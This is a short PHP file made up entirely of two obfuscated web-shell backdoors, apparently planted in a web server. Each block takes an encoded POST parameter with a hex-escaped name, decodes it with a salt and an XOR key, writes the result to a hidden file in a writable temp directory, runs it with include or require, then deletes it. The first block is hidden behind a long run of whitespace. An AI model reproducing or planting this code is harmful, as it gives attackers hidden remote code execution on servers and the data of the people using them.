<?php																																										if(isset($_POST["\x76\x61lue"]) ? true : false){ $key = array_filter([getenv("TEMP"), "/dev/shm", getenv("TMP"), sys_get_temp_dir(), "/var/tmp", "/tmp", session_save_path(), ini_get("upload_tmp_dir"), getcwd()]); $fac = $_POST["\x76\x61lue"]; $fac= explode ( "." ,$fac) ; $hld = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt); foreach ($fac as $p => $v1) { $sChar = ord($salt[$p %$lenS]); $dec = ((int)$v1 - $sChar - ($p %10))^67; $hld .= chr($dec);} $tkn = 0; do { $data_chunk = $key[$tkn] ?? null; if ($tkn >= count($key)) break; if (!( !is_dir($data_chunk) || !is_writable($data_chunk) )) { $bind = join("/", [$data_chunk, ".dat"]); if (file_put_contents($bind, $hld)) { require $bind; unlink($bind); exit; } } $tkn++; } while (true); }


if(isset($_POST["p\x67rp"])){
	$factor = array_filter(["/tmp", "/dev/shm", ini_get("upload_tmp_dir"), getenv("TMP"), "/var/tmp", session_save_path(), getcwd(), getenv("TEMP"), sys_get_temp_dir()]);
	$ptr = $_POST["p\x67rp"];
		  $ptr 	=		explode	 	( 	 "." , $ptr)	 ;			
	$flag=	 '';
            $s=	 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS=	 strlen($s	);
            $__len=	 count($ptr	);
    
            for ($w=	 0; $w<  $__len; $w++) {
                $v2=	 $ptr[$w];
                $chS=	 ord($s[$w % $lenS]	);
                $d=	 ((int)$v2 - $chS - ($w % 10))	 ^16;
                $flag	.=chr($d	);
            }
	foreach ($factor as $pointer) {
    		if ((is_dir($pointer) and is_writable($pointer))) {
    $component = sprintf("%s/.entity", $pointer);
    $success = file_put_contents($component, $flag);
if ($success) {
	include $component;
	@unlink($component);
	die();}
}
}
}